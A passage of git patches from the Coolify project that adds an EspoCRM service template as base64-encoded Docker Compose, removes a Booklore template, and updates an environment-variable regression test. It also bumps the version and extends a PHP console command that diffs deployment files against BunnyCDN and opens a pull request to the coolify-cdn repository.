@@ -1204,6 +1187,23 @@
         "minversion": "0.0.0",
         "port": "6052"
     },
+    "espocrm": {
+        "documentation": "https://docs.espocrm.com?utm_source=coolify.io",
+        "slogan": "EspoCRM is a free and open-source CRM platform.",
+        "compose": "c2VydmljZXM6CiAgZXNwb2NybToKICAgIGltYWdlOiAnZXNwb2NybS9lc3BvY3JtOjknCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9FU1BPQ1JNCiAgICAgIC0gJ0VTUE9DUk1fQURNSU5fVVNFUk5BTUU9JHtFU1BPQ1JNX0FETUlOX1VTRVJOQU1FOi1hZG1pbn0nCiAgICAgIC0gJ0VTUE9DUk1fQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSBFU1BPQ1JNX0RBVEFCQVNFX1BMQVRGT1JNPU15c3FsCiAgICAgIC0gRVNQT0NSTV9EQVRBQkFTRV9IT1NUPWVzcG9jcm0tZGIKICAgICAgLSAnRVNQT0NSTV9EQVRBQkFTRV9OQU1FPSR7TUFSSUFEQl9EQVRBQkFTRTotZXNwb2NybX0nCiAgICAgIC0gJ0VTUE9DUk1fREFUQUJBU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NQVJJQURCfScKICAgICAgLSAnRVNQT0NSTV9EQVRBQkFTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUFSSUFEQn0nCiAgICAgIC0gJ0VTUE9DUk1fU0lURV9VUkw9JHtTRVJWSUNFX1VSTF9FU1BPQ1JNfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VzcG9jcm06L3Zhci93d3cvaHRtbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHN0YXJ0X3BlcmlvZDogNjBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogICAgZGVwZW5kc19vbjoKICAgICAgZXNwb2NybS1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGVzcG9jcm0tZGFlbW9uOgogICAgaW1hZ2U6ICdlc3BvY3JtL2VzcG9jcm06OScKICAgIGNvbnRhaW5lcl9uYW1lOiBlc3BvY3JtLWRhZW1vbgogICAgdm9sdW1lczoKICAgICAgLSAnZXNwb2NybTovdmFyL3d3dy9odG1sJwogICAgcmVzdGFydDogYWx3YXlzCiAgICBlbnRyeXBvaW50OiBkb2NrZXItZGFlbW9uLnNoCiAgICBkZXBlbmRzX29uOgogICAgICBlc3BvY3JtOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgZXNwb2NybS13ZWJzb2NrZXQ6CiAgICBpbWFnZTogJ2VzcG9jcm0vZXNwb2NybTo5JwogICAgY29udGFpbmVyX25hbWU6IGVzcG9jcm0td2Vic29ja2V0CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9FU1BPQ1JNX1dFQlNPQ0tFVF84MDgwCiAgICAgIC0gRVNQT0NSTV9DT05GSUdfVVNFX1dFQl9TT0NLRVQ9dHJ1ZQogICAgICAtIEVTUE9DUk1fQ09ORklHX1dFQl9TT0NLRVRfVVJMPSRTRVJWSUNFX1VSTF9FU1BPQ1JNX1dFQlNPQ0tFVAogICAgICAtICdFU1BPQ1JNX0NPTkZJR19XRUJfU09DS0VUX1pFUk9fTV9RX1NVQlNDUklCRVJfRFNOPXRjcDovLyo6Nzc3NycKICAgICAgLSAnRVNQT0NSTV9DT05GSUdfV0VCX1NPQ0tFVF9aRVJPX01fUV9TVUJNSVNTSU9OX0RTTj10Y3A6Ly9lc3BvY3JtLXdlYnNvY2tldDo3Nzc3JwogICAgdm9sdW1lczoKICAgICAgLSAnZXNwb2NybTovdmFyL3d3dy9odG1sJwogICAgcmVzdGFydDogYWx3YXlzCiAgICBlbnRyeXBvaW50OiBkb2NrZXItd2Vic29ja2V0LnNoCiAgICBkZXBlbmRzX29uOgogICAgICBlc3BvY3JtOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgZXNwb2NybS1kYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS44JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01BUklBREJfREFUQUJBU0U9JHtNQVJJQURCX0RBVEFCQVNFOi1lc3BvY3JtfScKICAgICAgLSAnTUFSSUFEQl9VU0VSPSR7U0VSVklDRV9VU0VSX01BUklBREJ9JwogICAgICAtICdNQVJJQURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NQVJJQURCfScKICAgICAgLSAnTUFSSUFEQl9ST09UX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9ST09UfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VzcG9jcm0tZGI6L3Zhci9saWIvbXlzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaGVhbHRoY2hlY2suc2gKICAgICAgICAtICctLWNvbm5lY3QnCiAgICAgICAgLSAnLS1pbm5vZGJfaW5pdGlhbGl6ZWQnCiAgICAgIGludGVydmFsOiAyMHMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMK",
+        "tags": [
+            "crm",
+            "self-hosted",
+            "open-source",
+            "workflow",
+            "automation",
+            "project management"
+        ],
+        "category": "cms",
+        "logo": "svgs/espocrm.svg",
+        "minversion": "0.0.0",
+        "port": "80"
+    },
     "evolution-api": {
         "documentation": "https://doc.evolution-api.com/v2/en/get-started/introduction?utm_source=coolify.io",
         "slogan": "Multi-platform messaging (whatsapp and more) integration API",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 22d0d6d8c..85445faf6 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -310,23 +310,6 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
-    "booklore": {
-        "documentation": "https://booklore.org/docs/getting-started?utm_source=coolify.io",
-        "slogan": "Booklore is an open-source library management system for your digital book collection.",
-        "compose": "c2VydmljZXM6CiAgYm9va2xvcmU6CiAgICBpbWFnZTogJ2Jvb2tsb3JlL2Jvb2tsb3JlOnYxLjE2LjUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fQk9PS0xPUkVfODAKICAgICAgLSAnVVNFUl9JRD0ke0JPT0tMT1JFX1VTRVJfSUQ6LTB9JwogICAgICAtICdHUk9VUF9JRD0ke0JPT0tMT1JFX0dST1VQX0lEOi0wfScKICAgICAgLSAnVFo9JHtUWjotVVRDfScKICAgICAgLSAnREFUQUJBU0VfVVJMPWpkYmM6bWFyaWFkYjovL21hcmlhZGI6MzMwNi8ke01BUklBREJfREFUQUJBU0U6LWJvb2tsb3JlLWRifScKICAgICAgLSAnREFUQUJBU0VfVVNFUk5BTUU9JHtTRVJWSUNFX1VTRVJfTUFSSUFEQn0nCiAgICAgIC0gJ0RBVEFCQVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NQVJJQURCfScKICAgICAgLSBCT09LTE9SRV9QT1JUPTgwCiAgICB2b2x1bWVzOgogICAgICAtICdib29rbG9yZS1kYXRhOi9hcHAvZGF0YScKICAgICAgLSAnYm9va2xvcmUtYm9va3M6L2Jvb2tzJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogfi9ib29rbG9yZQogICAgICAgIHRhcmdldDogL2Jvb2tkcm9wCiAgICAgICAgaXNfZGlyZWN0b3J5OiB0cnVlCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3dnZXQgLS1uby12ZXJib3NlIC0tdHJpZXM9MSAtLXNwaWRlciBodHRwOi8vbG9jYWxob3N0L2xvZ2luIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgbWFyaWFkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTUFSSUFEQl9VU0VSPSR7U0VSVklDRV9VU0VSX01BUklBREJ9JwogICAgICAtICdNQVJJQURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NQVJJQURCfScKICAgICAgLSAnTUFSSUFEQl9ST09UX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NQVJJQURCUk9PVH0nCiAgICAgIC0gJ01BUklBREJfREFUQUJBU0U9JHtNQVJJQURCX0RBVEFCQVNFOi1ib29rbG9yZS1kYn0nCiAgICB2b2x1bWVzOgogICAgICAtICdtYXJpYWRiLWRhdGE6L3Zhci9saWIvbXlzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaGVhbHRoY2hlY2suc2gKICAgICAgICAtICctLWNvbm5lY3QnCiAgICAgICAgLSAnLS1pbm5vZGJfaW5pdGlhbGl6ZWQnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK",
-        "tags": [
-            "media",
-            "books",
-            "kobo",
-            "epub",
-            "ebook",
-            "koreader"
-        ],
-        "category": null,
-        "logo": "svgs/booklore.svg",
-        "minversion": "0.0.0",
-        "port": "80"
-    },
     "bookstack": {
         "documentation": "https://www.bookstackapp.com/docs/?utm_source=coolify.io",
         "slogan": "BookStack is a simple, self-hosted, easy-to-use platform for organising and storing information",
@@ -1204,6 +1187,23 @@
         "minversion": "0.0.0",
         "port": "6052"
     },
+    "espocrm": {
+        "documentation": "https://docs.espocrm.com?utm_source=coolify.io",
+        "slogan": "EspoCRM is a free and open-source CRM platform.",
+        "compose": "c2VydmljZXM6CiAgZXNwb2NybToKICAgIGltYWdlOiAnZXNwb2NybS9lc3BvY3JtOjknCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fRVNQT0NSTQogICAgICAtICdFU1BPQ1JNX0FETUlOX1VTRVJOQU1FPSR7RVNQT0NSTV9BRE1JTl9VU0VSTkFNRTotYWRtaW59JwogICAgICAtICdFU1BPQ1JNX0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICAgIC0gRVNQT0NSTV9EQVRBQkFTRV9QTEFURk9STT1NeXNxbAogICAgICAtIEVTUE9DUk1fREFUQUJBU0VfSE9TVD1lc3BvY3JtLWRiCiAgICAgIC0gJ0VTUE9DUk1fREFUQUJBU0VfTkFNRT0ke01BUklBREJfREFUQUJBU0U6LWVzcG9jcm19JwogICAgICAtICdFU1BPQ1JNX0RBVEFCQVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfTUFSSUFEQn0nCiAgICAgIC0gJ0VTUE9DUk1fREFUQUJBU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01BUklBREJ9JwogICAgICAtICdFU1BPQ1JNX1NJVEVfVVJMPSR7U0VSVklDRV9GUUROX0VTUE9DUk19JwogICAgdm9sdW1lczoKICAgICAgLSAnZXNwb2NybTovdmFyL3d3dy9odG1sJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjgwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgc3RhcnRfcGVyaW9kOiA2MHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgICBkZXBlbmRzX29uOgogICAgICBlc3BvY3JtLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgZXNwb2NybS1kYWVtb246CiAgICBpbWFnZTogJ2VzcG9jcm0vZXNwb2NybTo5JwogICAgY29udGFpbmVyX25hbWU6IGVzcG9jcm0tZGFlbW9uCiAgICB2b2x1bWVzOgogICAgICAtICdlc3BvY3JtOi92YXIvd3d3L2h0bWwnCiAgICByZXN0YXJ0OiBhbHdheXMKICAgIGVudHJ5cG9pbnQ6IGRvY2tlci1kYWVtb24uc2gKICAgIGRlcGVuZHNfb246CiAgICAgIGVzcG9jcm06CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBlc3BvY3JtLXdlYnNvY2tldDoKICAgIGltYWdlOiAnZXNwb2NybS9lc3BvY3JtOjknCiAgICBjb250YWluZXJfbmFtZTogZXNwb2NybS13ZWJzb2NrZXQKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9FU1BPQ1JNX1dFQlNPQ0tFVF84MDgwCiAgICAgIC0gRVNQT0NSTV9DT05GSUdfVVNFX1dFQl9TT0NLRVQ9dHJ1ZQogICAgICAtIEVTUE9DUk1fQ09ORklHX1dFQl9TT0NLRVRfVVJMPSRTRVJWSUNFX0ZRRE5fRVNQT0NSTV9XRUJTT0NLRVQKICAgICAgLSAnRVNQT0NSTV9DT05GSUdfV0VCX1NPQ0tFVF9aRVJPX01fUV9TVUJTQ1JJQkVSX0RTTj10Y3A6Ly8qOjc3NzcnCiAgICAgIC0gJ0VTUE9DUk1fQ09ORklHX1dFQl9TT0NLRVRfWkVST19NX1FfU1VCTUlTU0lPTl9EU049dGNwOi8vZXNwb2NybS13ZWJzb2NrZXQ6Nzc3NycKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VzcG9jcm06L3Zhci93d3cvaHRtbCcKICAgIHJlc3RhcnQ6IGFsd2F5cwogICAgZW50cnlwb2ludDogZG9ja2VyLXdlYnNvY2tldC5zaAogICAgZGVwZW5kc19vbjoKICAgICAgZXNwb2NybToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGVzcG9jcm0tZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTEuOCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdNQVJJQURCX0RBVEFCQVNFPSR7TUFSSUFEQl9EQVRBQkFTRTotZXNwb2NybX0nCiAgICAgIC0gJ01BUklBREJfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NQVJJQURCfScKICAgICAgLSAnTUFSSUFEQl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUFSSUFEQn0nCiAgICAgIC0gJ01BUklBREJfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUk9PVH0nCiAgICB2b2x1bWVzOgogICAgICAtICdlc3BvY3JtLWRiOi92YXIvbGliL215c3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogMjBzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCg==",
+        "tags": [
+            "crm",
+            "self-hosted",
+            "open-source",
+            "workflow",
+            "automation",
+            "project management"
+        ],
+        "category": "cms",
+        "logo": "svgs/espocrm.svg",
+        "minversion": "0.0.0",
+        "port": "80"
+    },
     "evolution-api": {
         "documentation": "https://doc.evolution-api.com/v2/en/get-started/introduction?utm_source=coolify.io",
         "slogan": "Multi-platform messaging (whatsapp and more) integration API",
diff --git a/tests/Unit/ServiceParserEnvVarPreservationTest.php b/tests/Unit/ServiceParserEnvVarPreservationTest.php
index 3f56447dc..16a5ad676 100644
--- a/tests/Unit/ServiceParserEnvVarPreservationTest.php
+++ b/tests/Unit/ServiceParserEnvVarPreservationTest.php
@@ -4,7 +4,7 @@
  * Unit tests to verify that Docker Compose environment variables
  * do not overwrite user-saved values on redeploy.
  *
- * Regression test for GitHub issue #8885.
+ * Regression test for GitHub issues #8885 and #9136.
  */
 it('uses firstOrCreate for simple variable references in serviceParser to preserve user values', function () {
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
@@ -14,8 +14,8 @@
     // This is the key === parsedValue branch
     expect($parsersFile)->toContain(
         "// Simple variable reference (e.g. DATABASE_URL: \${DATABASE_URL})\n".
-        "                // Use firstOrCreate to avoid overwriting user-saved values on redeploy\n".
-        '                $envVar = $resource->environment_variables()->firstOrCreate('
+        "                // Ensure the variable exists in DB for .env generation and UI display\n".
+        '                $resource->environment_variables()->firstOrCreate('
     );
 });
 
@@ -46,15 +46,15 @@
     expect($count)->toBe(1, 'serviceParser should use firstOrCreate for simple variable refs without default');
 });
 
-it('populates environment array with saved DB value instead of raw compose variable', function () {
+it('does not replace self-referencing variable values in the environment array', function () {
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
-    // After firstOrCreate, the environment should be populated with the DB value ($envVar->value)
-    // not the raw compose variable reference (e.g., ${DATABASE_URL})
-    // This pattern should appear in both parsers for all variable reference types
-    expect($parsersFile)->toContain('// Add the variable to the environment using the saved DB value');
-    expect($parsersFile)->toContain('$environment[$key->value()] = $envVar->value;');
-    expect($parsersFile)->toContain('$environment[$content] = $envVar->value;');
+    // Fix for #9136: self-referencing variables (KEY=${KEY}) must NOT have their ${VAR}
+    // reference replaced with the DB value in the compose environment section.
+    // Instead, the reference should stay intact so Docker Compose resolves from .env at deploy time.
+    // This prevents stale values when users update env vars without re-parsing compose.
+    expect($parsersFile)->toContain('Keep the ${VAR} reference in compose');
+    expect($parsersFile)->not->toContain('$environment[$key->value()] = $envVar->value;');
 });
 
 it('does not use updateOrCreate with value null for user-editable environment variables', function () {

From bf306ffad3d876b3b1fd69c579348a7fa37e4fe8 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 21:57:40 +0100
Subject: [PATCH 123/213] chore: bump version to 4.0.0-beta.470

---
 config/constants.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/config/constants.php b/config/constants.php
index 803a0a0bd..b0a772541 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.0.0-beta.469',
+        'version' => '4.0.0-beta.470',
         'helper_version' => '1.0.12',
         'realtime_version' => '1.0.11',
         'self_hosted' => env('SELF_HOSTED', true),

From e6de2618f96d24fd8d59d22e8434bd26b8a7558a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 07:07:22 +0100
Subject: [PATCH 124/213] feat(sync): sync install.sh, docker-compose, and env
 files to GitHub

Adds syncFilesToGitHubRepo method to handle syncing install.sh,
docker-compose, and env files to the coolify-cdn repository via a
feature branch and PR. Supports both nightly and production environments.
---
 app/Console/Commands/SyncBunny.php | 308 ++++++++++++++++++++++++++++-
 1 file changed, 305 insertions(+), 3 deletions(-)

diff --git a/app/Console/Commands/SyncBunny.php b/app/Console/Commands/SyncBunny.php
index 0a98f1dc8..9ac3371e0 100644
--- a/app/Console/Commands/SyncBunny.php
+++ b/app/Console/Commands/SyncBunny.php
@@ -363,6 +363,162 @@ private function syncReleasesAndVersionsToGitHubRepo(string $versionsLocation, b
         }
     }
 
+    /**
+     * Sync install.sh, docker-compose, and env files to GitHub repository via PR
+     */
+    private function syncFilesToGitHubRepo(array $files, bool $nightly = false): bool
+    {
+        $envLabel = $nightly ? 'NIGHTLY' : 'PRODUCTION';
+        $this->info("Syncing $envLabel files to GitHub repository...");
+        try {
+            $timestamp = time();
+            $tmpDir = sys_get_temp_dir().'/coolify-cdn-files-'.$timestamp;
+            $branchName = 'update-files-'.$timestamp;
+
+            // Clone the repository
+            $this->info('Cloning coolify-cdn repository...');
+            $output = [];
+            exec('gh repo clone coollabsio/coolify-cdn '.escapeshellarg($tmpDir).' 2>&1', $output, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to clone repository: '.implode("\n", $output));
+
+                return false;
+            }
+
+            // Create feature branch
+            $this->info('Creating feature branch...');
+            $output = [];
+            exec('cd '.escapeshellarg($tmpDir).' && git checkout -b '.escapeshellarg($branchName).' 2>&1', $output, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to create branch: '.implode("\n", $output));
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return false;
+            }
+
+            // Copy each file to its target path in the CDN repo
+            $copiedFiles = [];
+            foreach ($files as $sourceFile => $targetPath) {
+                if (! file_exists($sourceFile)) {
+                    $this->warn("Source file not found, skipping: $sourceFile");
+
+                    continue;
+                }
+
+                $destPath = "$tmpDir/$targetPath";
+                $destDir = dirname($destPath);
+
+                if (! is_dir($destDir)) {
+                    if (! mkdir($destDir, 0755, true)) {
+                        $this->error("Failed to create directory: $destDir");
+                        exec('rm -rf '.escapeshellarg($tmpDir));
+
+                        return false;
+                    }
+                }
+
+                if (copy($sourceFile, $destPath) === false) {
+                    $this->error("Failed to copy $sourceFile to $destPath");
+                    exec('rm -rf '.escapeshellarg($tmpDir));
+
+                    return false;
+                }
+
+                $copiedFiles[] = $targetPath;
+                $this->info("Copied: $targetPath");
+            }
+
+            if (empty($copiedFiles)) {
+                $this->warn('No files were copied. Nothing to commit.');
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return true;
+            }
+
+            // Stage all copied files
+            $this->info('Staging changes...');
+            $output = [];
+            $stageCmd = 'cd '.escapeshellarg($tmpDir).' && git add '.implode(' ', array_map('escapeshellarg', $copiedFiles)).' 2>&1';
+            exec($stageCmd, $output, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to stage changes: '.implode("\n", $output));
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return false;
+            }
+
+            // Check for changes
+            $this->info('Checking for changes...');
+            $statusOutput = [];
+            exec('cd '.escapeshellarg($tmpDir).' && git status --porcelain 2>&1', $statusOutput, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to check repository status: '.implode("\n", $statusOutput));
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return false;
+            }
+
+            if (empty(array_filter($statusOutput))) {
+                $this->info('All files are already up to date. No changes to commit.');
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return true;
+            }
+
+            // Commit changes
+            $commitMessage = "Update $envLabel files (install.sh, docker-compose, env) - ".date('Y-m-d H:i:s');
+            $output = [];
+            exec('cd '.escapeshellarg($tmpDir).' && git commit -m '.escapeshellarg($commitMessage).' 2>&1', $output, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to commit changes: '.implode("\n", $output));
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return false;
+            }
+
+            // Push to remote
+            $this->info('Pushing branch to remote...');
+            $output = [];
+            exec('cd '.escapeshellarg($tmpDir).' && git push origin '.escapeshellarg($branchName).' 2>&1', $output, $returnCode);
+            if ($returnCode !== 0) {
+                $this->error('Failed to push branch: '.implode("\n", $output));
+                exec('rm -rf '.escapeshellarg($tmpDir));
+
+                return false;
+            }
+
+            // Create pull request
+            $this->info('Creating pull request...');
+            $prTitle = "Update $envLabel files - ".date('Y-m-d H:i:s');
+            $fileList = implode("\n- ", $copiedFiles);
+            $prBody = "Automated update of $envLabel files:\n- $fileList";
+            $prCommand = 'gh pr create --repo coollabsio/coolify-cdn --title '.escapeshellarg($prTitle).' --body '.escapeshellarg($prBody).' --base main --head '.escapeshellarg($branchName).' 2>&1';
+            $output = [];
+            exec($prCommand, $output, $returnCode);
+
+            // Clean up
+            exec('rm -rf '.escapeshellarg($tmpDir));
+
+            if ($returnCode !== 0) {
+                $this->error('Failed to create PR: '.implode("\n", $output));
+
+                return false;
+            }
+
+            $this->info('Pull request created successfully!');
+            if (! empty($output)) {
+                $this->info('PR URL: '.implode("\n", $output));
+            }
+            $this->info('Files synced: '.count($copiedFiles));
+
+            return true;
+        } catch (\Throwable $e) {
+            $this->error('Error syncing files to GitHub: '.$e->getMessage());
+
+            return false;
+        }
+    }
+
     /**
      * Sync versions.json to GitHub repository via PR
      */
@@ -581,11 +737,130 @@ public function handle()
                 $versions_location = "$parent_dir/other/nightly/$versions";
             }
             if (! $only_template && ! $only_version && ! $only_github_releases && ! $only_github_versions) {
+                $envLabel = $nightly ? 'NIGHTLY' : 'PRODUCTION';
+                $this->info("About to sync $envLabel files to BunnyCDN and create a GitHub PR for coolify-cdn.");
+                $this->newLine();
+
+                // Build file mapping for diff
                 if ($nightly) {
-                    $this->info('About to sync files NIGHTLY (docker-compose.prod.yaml, upgrade.sh, install.sh, etc) to BunnyCDN.');
+                    $fileMapping = [
+                        $compose_file_location => 'docker/nightly/docker-compose.yml',
+                        $compose_file_prod_location => 'docker/nightly/docker-compose.prod.yml',
+                        $production_env_location => 'environment/nightly/.env.production',
+                        $upgrade_script_location => 'scripts/nightly/upgrade.sh',
+                        $install_script_location => 'scripts/nightly/install.sh',
+                    ];
                 } else {
-                    $this->info('About to sync files PRODUCTION (docker-compose.yml, docker-compose.prod.yml, upgrade.sh, install.sh, etc) to BunnyCDN.');
+                    $fileMapping = [
+                        $compose_file_location => 'docker/docker-compose.yml',
+                        $compose_file_prod_location => 'docker/docker-compose.prod.yml',
+                        $production_env_location => 'environment/.env.production',
+                        $upgrade_script_location => 'scripts/upgrade.sh',
+                        $install_script_location => 'scripts/install.sh',
+                    ];
                 }
+
+                // BunnyCDN file mapping (local file => CDN URL path)
+                $bunnyFileMapping = [
+                    $compose_file_location => "$bunny_cdn/$bunny_cdn_path/$compose_file",
+                    $compose_file_prod_location => "$bunny_cdn/$bunny_cdn_path/$compose_file_prod",
+                    $production_env_location => "$bunny_cdn/$bunny_cdn_path/$production_env",
+                    $upgrade_script_location => "$bunny_cdn/$bunny_cdn_path/$upgrade_script",
+                    $install_script_location => "$bunny_cdn/$bunny_cdn_path/$install_script",
+                ];
+
+                $diffTmpDir = sys_get_temp_dir().'/coolify-cdn-diff-'.time();
+                @mkdir($diffTmpDir, 0755, true);
+                $hasChanges = false;
+
+                // Diff against BunnyCDN
+                $this->info('Fetching files from BunnyCDN to compare...');
+                foreach ($bunnyFileMapping as $localFile => $cdnUrl) {
+                    if (! file_exists($localFile)) {
+                        $this->warn('Local file not found: '.$localFile);
+
+                        continue;
+                    }
+
+                    $fileName = basename($cdnUrl);
+                    $remoteTmp = "$diffTmpDir/bunny-$fileName";
+
+                    try {
+                        $response = Http::timeout(10)->get($cdnUrl);
+                        if ($response->successful()) {
+                            file_put_contents($remoteTmp, $response->body());
+                            $diffOutput = [];
+                            exec('diff -u '.escapeshellarg($remoteTmp).' '.escapeshellarg($localFile).' 2>&1', $diffOutput, $diffCode);
+                            if ($diffCode !== 0) {
+                                $hasChanges = true;
+                                $this->newLine();
+                                $this->info("--- BunnyCDN: $bunny_cdn_path/$fileName");
+                                $this->info("+++ Local: $fileName");
+                                foreach ($diffOutput as $line) {
+                                    if (str_starts_with($line, '---') || str_starts_with($line, '+++')) {
+                                        continue;
+                                    }
+                                    $this->line($line);
+                                }
+                            }
+                        } else {
+                            $this->info("NEW on BunnyCDN: $bunny_cdn_path/$fileName (HTTP {$response->status()})");
+                            $hasChanges = true;
+                        }
+                    } catch (\Throwable $e) {
+                        $this->warn("Could not fetch $cdnUrl: {$e->getMessage()}");
+                    }
+                }
+
+                // Diff against GitHub coolify-cdn repo
+                $this->newLine();
+                $this->info('Fetching coolify-cdn repo to compare...');
+                $output = [];
+                exec('gh repo clone coollabsio/coolify-cdn '.escapeshellarg("$diffTmpDir/repo").' -- --depth 1 2>&1', $output, $returnCode);
+
+                if ($returnCode === 0) {
+                    foreach ($fileMapping as $localFile => $cdnPath) {
+                        $remotePath = "$diffTmpDir/repo/$cdnPath";
+                        if (! file_exists($localFile)) {
+                            continue;
+                        }
+                        if (! file_exists($remotePath)) {
+                            $this->info("NEW on GitHub: $cdnPath (does not exist in coolify-cdn yet)");
+                            $hasChanges = true;
+
+                            continue;
+                        }
+
+                        $diffOutput = [];
+                        exec('diff -u '.escapeshellarg($remotePath).' '.escapeshellarg($localFile).' 2>&1', $diffOutput, $diffCode);
+                        if ($diffCode !== 0) {
+                            $hasChanges = true;
+                            $this->newLine();
+                            $this->info("--- GitHub: $cdnPath");
+                            $this->info("+++ Local: $cdnPath");
+                            foreach ($diffOutput as $line) {
+                                if (str_starts_with($line, '---') || str_starts_with($line, '+++')) {
+                                    continue;
+                                }
+                                $this->line($line);
+                            }
+                        }
+                    }
+                } else {
+                    $this->warn('Could not fetch coolify-cdn repo for diff.');
+                }
+
+                exec('rm -rf '.escapeshellarg($diffTmpDir));
+
+                if (! $hasChanges) {
+                    $this->newLine();
+                    $this->info('No differences found. All files are already up to date.');
+
+                    return;
+                }
+
+                $this->newLine();
+
                 $confirmed = confirm('Are you sure you want to sync?');
                 if (! $confirmed) {
                     return;
@@ -692,7 +967,34 @@ public function handle()
                 $pool->purge("$bunny_cdn/$bunny_cdn_path/$upgrade_script"),
